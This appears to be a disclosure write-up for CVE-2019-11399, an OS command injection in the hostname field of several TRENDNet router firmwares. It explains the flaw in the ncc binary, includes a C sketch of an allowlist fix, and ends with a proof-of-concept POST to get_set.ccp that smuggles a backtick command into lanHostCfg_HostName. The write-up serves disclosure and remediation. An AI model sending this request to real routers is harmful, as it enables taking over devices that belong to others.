TRENDNet

Exploit Author: [email protected]

Vendor: TRENDNet

CVE-2019-11399

Firmware version: TEW-651BR 2.04B1, TEW-652BRP 3.04b01, and TEW-652BRU 1.00b12

Vulnerability details

When the web service processes a LAN configuration POST request to 'get_set.ccp', the 'lanHostCfg_HostName_1.1.1.0.0' parameter can trigger an OS command injection vulnerability.

The value of the 'lanHostCfg_HostName_1.1.1.0.0' parameter is passed to the 'apLanOpFunc' and 'routerLanOpFunc' functions in the ncc binary without any sanitization.

These functions call '_system("hostname %s",(int)data + 0x38);' while '(int)data + 0x38' points to the submitted string, here "`cmd`", so the shell that runs the formatted command line also executes the text between the backticks.

With this OS command injection vulnerability, an attacker can execute any command on the firmware.
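A hardened form of the hostname handling described above, as an added example that is not the vendor's code or part of the original write-up. The names hostname_is_valid and set_hostname_checked are hypothetical, and the sketch assumes the device only needs a single-label hostname.

```c
#define _DEFAULT_SOURCE            /* exposes sethostname() in glibc */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LABEL_MAX 63               /* longest single DNS label (RFC 1123) */

/* 1 if s is one RFC 1123 label: 1..63 of [A-Za-z0-9-], no leading or
 * trailing '-'. Backticks, '$', ';', '|', '&', spaces and newlines all
 * fail the allowlist, so nothing shell-significant survives. */
int hostname_is_valid(const char *s)
{
    size_t len, i;

    if (s == NULL || (len = strlen(s)) == 0 || len > LABEL_MAX)
        return 0;
    if (s[0] == '-' || s[len - 1] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        char c = s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-'))
            return 0;
    }
    return 1;
}

/* Hypothetical stand-in for the _system("hostname %s", ...) call: validate,
 * then use the sethostname(2) syscall so no shell ever parses the value.
 * Returns 0 on success, -1 with errno set on failure. */
int set_hostname_checked(const char *name)
{
    if (!hostname_is_valid(name)) {
        errno = EINVAL;
        return -1;
    }
    return sethostname(name, strlen(name));
}

int main(void)
{
    /* Constructed sample values; the second is the PoC's parameter value. */
    const char *samples[] = { "TEW-651BR", "`cmd`", "my router", "" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s -> %s\n", samples[i],
               hostname_is_valid(samples[i]) ? "accept" : "reject");
    return 0;
}
```

The allowlist and the direct syscall are independent layers: either one alone stops the backtick value from reaching a shell.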

PoC POST message

POST /get_set.ccp HTTP/1.1

ccp_act=set&
ccpSubEvent=CCP_SUB_LAN&
nextPage=lan.htm&
old_ip=192.168.10.1&
old_mask=255.255.255.0&
new_ip=192.168.10.1&
new_mask=255.255.255.0&
igd_DeviceMode_1.0.0.0.0=0&
lanHostCfg_HostName_1.1.1.0.0=`cmd`&
lanHostCfg_IPAddress_1.1.1.0.0=192.168.10.1&
lanHostCfg_SubnetMask_1.1.1.0.0=255.255.255.0&
lanHostCfg_DHCPServerEnable_1.1.1.0.0=1&
lanHostCfg_MinAddress_1.1.1.0.0=192.168.10.101&
lanHostCfg_MaxAddress_1.1.1.0.0=192.168.10.199&
lanHostCfg_DomainName_1.1.1.0.0=&
lanHostCfg_DHCPLeaseTime_1.1.1.0.0=10080&
lanHostCfg_StaticDHCPEnable_1.1.1.0.0=1